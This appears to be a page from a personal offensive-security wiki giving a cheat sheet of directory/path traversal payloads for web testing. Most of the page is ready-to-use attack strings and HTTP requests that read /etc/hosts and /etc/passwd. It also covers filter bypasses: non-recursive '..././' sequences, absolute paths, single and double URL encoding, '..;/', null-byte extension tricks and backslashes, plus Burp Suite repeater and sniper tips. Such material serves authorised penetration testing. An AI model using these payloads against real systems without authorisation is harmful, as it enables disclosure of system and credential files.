LOGO
OFFENSIVE | DEFENSIVE | WIKI | ABOUT

[DIRECTORY/PATH TRAVERSAL]



GENERAL COMMANDS DESCRIPTION: Collection of commands to use when testing for path/directory traversal. C1: ../../../../etc/hosts C2: 3-1 METHOD ..././..././..././..././..././..././..././..././etc/hosts | non-recursively C3: /etc/hosts | absolute path bypass Try:
* Nullbyte | %00 * Encoding * Double Encoding * UTF-8 Encoding | | WAF bypass C4: ..././etc/hosts C5: ..;/etc/hosts |
URL-DECODING NOTE: It is important to encode one, two, three times, it will be slow but it is important to test if exist any encoding that can be used to bypass the control. [burpsuite > crtl + u (encode) | ctrl + shift + u (decode)] SAMPLES: > encoded 1 time C1: ..%2f..%2f..%2fetc/hosts > encoded 2 times C2: ..%252f..%252f..%252fetc/hosts |
VALIDATIONS > SPECIFIC PATHS SAMPLE: GET /image?filename=/var/www/img/24.jpg HTTP/2 Host: machetevault.github.io Cookie: session=j5QWoOCqRn5B2jGgronDtpWr6Vz055yb NOTE: Sometimes exist some kind of validations as countermeasure to avoid path traversal. Maybe it is expecting same path and is only validating that, so, attempts can be executed. [absolute, encoded, non-recursive, etc.] SAMPLE: GET /image?filename=/var/www/images/../../../etc/passwd C1: ../../../../etc/hosts > FILE EXTENSION NOTE: 1. If it is validating the extension, it will be needed to intercept the request > send request to repeater and change the extension. 2. Check headers to see if there's some place providing what it is accepting. NULL VALIDATION You can use the value %00 to test for null validation. Sometimes you can find that vulnerability when the application is retrieving images, files and more. SAMPLE: GET /image?filename=../../../etc/hosts%00.png HTTP/2
NOTE: 1. All can be tested with 1, 2, or any segments [../] as needed all applications will behave different. If needed, SNIPER ATTACK! (or similar). Also, invert the symbol, use backslash and try it. ["..\"] 2. It is good to enable all columns in burpsuite to see the entire picture. [MIME Type Filters] CHECK THE FOLLOWING LINK, >>> FILE SYSTEM >>> It can be used to check valuable files per OS.

©® - Since 2023